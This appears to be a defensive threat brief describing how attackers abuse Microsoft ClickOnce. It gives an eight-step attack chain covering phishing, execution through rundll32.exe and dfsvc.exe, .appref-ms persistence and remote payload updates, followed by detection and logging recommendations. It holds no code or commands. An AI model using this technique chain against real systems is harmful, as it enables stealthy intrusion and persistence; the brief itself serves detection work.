Threat Actors Weaponize ClickOnce Technology for Initial Access, Execution, and Persistence

Threat actors are increasingly leveraging Microsoft's ClickOnce application deployment technology as a robust vector for delivering malware, achieving initial access, and maintaining persistence on Windows endpoints. This new abuse, highlighted by CrowdStrike, takes advantage of ClickOnce's user-friendly deployment process, which requires minimal user interaction and no administrative privileges, making it highly effective against standard user accounts. Attackers exploit the fact that .application and .appref-ms files often bypass the scrutiny applied to .exe files, allowing malicious payloads to execute within legitimate Microsoft process trees (e.g., rundll32.exe and dfsvc.exe). By controlling the deployment server, adversaries can push malicious updates to seemingly benign applications, ensuring persistent remote access and the ability to update their malware as needed, including for lateral movement and C2 address changes. This method presents a significant challenge to defenders due to its stealthiness and ability to evade traditional detection mechanisms.

Attack Chain

1. Initial Access: Threat actors initiate the attack via social engineering, typically through phishing emails or malicious websites, to trick users into clicking a link or button.
2. Deployment Trigger: The user interaction results in the download and subsequent execution (or "running") of a malicious ClickOnce manifest file (.application).
3. Application Launch: Windows processes the .application file by launching rundll32.exe with dfshim.dll to handle the ClickOnce deployment.
4. Malicious Payload Execution: rundll32.exe (via dfshim.dll) or dfsvc.exe (the ClickOnce Deployment Service) connects to an attacker-controlled remote server specified in the manifest, downloads application components, and executes a malicious payload within their legitimate process trees.
5. Persistence Establishment: As part of the deployment, a malicious .appref-ms shortcut file is dropped into the user's Start Menu directory (%Users%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\).
6. Remote Update Mechanism: The .appref-ms file is configured for offline availability and points to the attacker-controlled deployment server, enabling dynamic content delivery.
7. Persistent Malicious Execution: Subsequent launches of the application from the Start Menu via the .appref-ms shortcut trigger dfsvc.exe to check the attacker-controlled server, download, and execute updated or entirely new malicious components without requiring further user authorization.
8. Impact: This grants adversaries persistent remote access, facilitates command and control updates, and enables further post-exploitation activities such as lateral movement, all while operating under the guise of legitimate system processes.

Impact

The abuse of ClickOnce technology allows threat actors to achieve highly stealthy and persistent access to victim systems. By operating within legitimate Microsoft processes (rundll32.exe, dfsvc.exe), malicious payloads can bypass many traditional endpoint detection and prevention mechanisms. This method lowers the barrier to entry for attackers as it requires no elevated privileges and minimal user interaction. Successful attacks lead to persistent remote access, enabling data exfiltration, C2 communication, deployment of additional malware, and potential lateral movement across the network, making it difficult to detect and remediate.

Recommendation

• Deploy the Sigma rules in this brief to your SIEM and tune for your environment to detect suspicious ClickOnce activity.
• Enable Sysmon process creation (Event ID 1) logging to capture rundll32.exe and dfsvc.exe activity for the Detect ClickOnce Deployment Via rundll32.exe from Remote Source and Detect ClickOnce Service Spawning Suspicious Processes rules.
• Configure file event logging (e.g., Sysmon Event ID 11 for file creation) for the Detect Suspicious .appref-ms File Creation in Start Menu rule.
• Educate users about the dangers of running .application files from untrusted sources, even if they appear to originate from seemingly legitimate websites or emails.